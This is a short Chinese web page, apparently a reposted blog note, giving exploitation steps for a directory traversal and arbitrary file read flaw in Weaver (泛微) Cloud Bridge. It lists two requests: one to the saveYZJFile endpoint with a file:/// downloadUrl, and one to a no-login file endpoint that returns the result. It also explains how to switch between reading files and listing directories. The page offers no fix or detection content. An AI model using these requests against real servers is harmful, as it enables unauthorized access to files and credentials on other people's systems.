泛微云桥目录遍历+任意文件读取 最新


上一篇文章:泛微云桥任意文件读取漏洞

利用方式:

第一步:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt  

第二步:

/file/fileNoLogin/id

注:

downloadUrl参数填写文件的绝对路径时,可以造成任意文件读取;

downloadUrl参数填写目录的绝对路径时,可以造成目录遍历。

 

 

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM